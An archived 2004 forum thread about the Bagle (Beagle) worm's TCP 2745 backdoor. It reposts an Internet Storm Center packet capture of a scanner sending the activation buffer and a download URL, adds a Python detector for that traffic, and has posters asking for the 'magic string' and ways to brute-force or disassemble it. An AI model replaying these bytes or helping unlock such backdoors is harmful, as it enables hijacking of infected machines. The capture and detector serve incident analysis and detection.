Full Version: Beagle Virus Exploit
Erra
Found at Internet Storm... http://isc.incidents.org/diary.php?date=2004-03-29

Beagle Virus Exploit
====================
Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745 (TCP). We do monitor increased scanning activity for this port. Today, a reader submitted a tool which is used to scan for Beagle-infected systems. If the tool finds port 2745 open, it will send the 'magic string' to open the backdoor. Next, a URL is sent to the system. The Bagle-infected system will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)
18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download
18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http

Proves that something is out there that utilises this virus's backdoor capabilities.
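As an added detection example (not from the ISC diary or from anyone in this thread): a small parser for tcpdump "-x" hex output that reconstructs the TCP payload of each packet and flags the two client-side steps of the session above, data pushed at port 2745 followed by a payload that hands the infected host a URL. The SAMPLE text is constructed from the three data-carrying packets shown above (wrapped header lines joined), and the regexes, function names and finding format are my own assumptions.

```python
import re

# Constructed sample input: the data-carrying packets from the session above.
SAMPLE = """\
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win 17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win 5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........
18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win 17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http
"""
BACKDOOR_PORT = 2745
HDR = re.compile(r"^\d\d:\d\d:\d\d\.\d+ (\S+)\.(\d+) > (\S+)\.(\d+): ")
HEXWORD = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$")  # 4-digit word or lone last byte

def parse_packets(dump):
    """Return (src, sport, dst, dport, tcp_payload) for each packet in the dump."""
    pkts = []
    for line in dump.splitlines():
        if m := HDR.match(line):
            pkts.append([m[1], int(m[2]), m[3], int(m[4]), bytearray()])
        elif line.startswith("0x") and pkts:
            for tok in line.split()[1:]:
                if not HEXWORD.match(tok):      # reached the ASCII column
                    break
                pkts[-1][4] += bytes.fromhex(tok)
    out = []
    for src, sport, dst, dport, raw in pkts:
        ihl = (raw[0] & 0x0F) * 4                  # IPv4 header length
        total = int.from_bytes(raw[2:4], "big")    # IP total length: drops dump padding
        doff = (raw[ihl + 12] >> 4) * 4            # TCP data offset
        out.append((src, sport, dst, dport, bytes(raw[ihl + doff:total])))
    return out

def detect_backdoor_use(dump):
    """Flag hosts that push data at TCP/2745 and then hand the infected host a URL."""
    findings, activated = [], set()
    for src, sport, dst, dport, payload in parse_packets(dump):
        if dport != BACKDOOR_PORT or not payload:
            continue
        if src not in activated:                   # step 2: activation buffer
            activated.add(src)
            findings.append(f"{src} -> {dst}:{dport} backdoor activation, {len(payload)} bytes")
        elif payload.startswith(b"'http"):         # step 4: download command
            findings.append(f"{src} -> {dst}:{dport} download command {payload!r}")
    return findings
```

The IP total-length field is used to trim the trailing bytes tcpdump prints past the end of short packets, which is why the single-byte reply and the five-byte URL fragment come out at their true lengths.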
stonebreaker
I see.
I think the most important thing is to know the 'magic string',
but I can't find it from
QUOTE
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

Anyone know it? Please post it.
Thx
vnet576
Just curious, would it be possible to brute-force the password of this worm?
buzzons
It should be possible to see, if you packet-sniff, what data is sent in and out, surely?

buz
shaun2k2
I'm not exactly suggesting someone does this, but the best thing to do would be to get hold of the Beagle virus, and disassemble it. Perhaps you could try "grepping" the disassembly for CMP instructions - this might be a tell-tale sign of the virus comparing the supplied potential magic string to the correct magic string. From this, you might be able to find the magic string as a static value in the virus assembly code.


-Shaun.
ScriptGod
This traffic log is from a Beagle.A/.B or .C.
This version uses no hashes; it uses a "direct password", which stands clearly in the code, so it's not hard to find out.
These versions of the worm are DEAD.
All higher versions use a hash function, so you have to brute-force it.
Thom
Brute-forcing must be possible since sPiKiE already coded his sploit for it, but it's not public...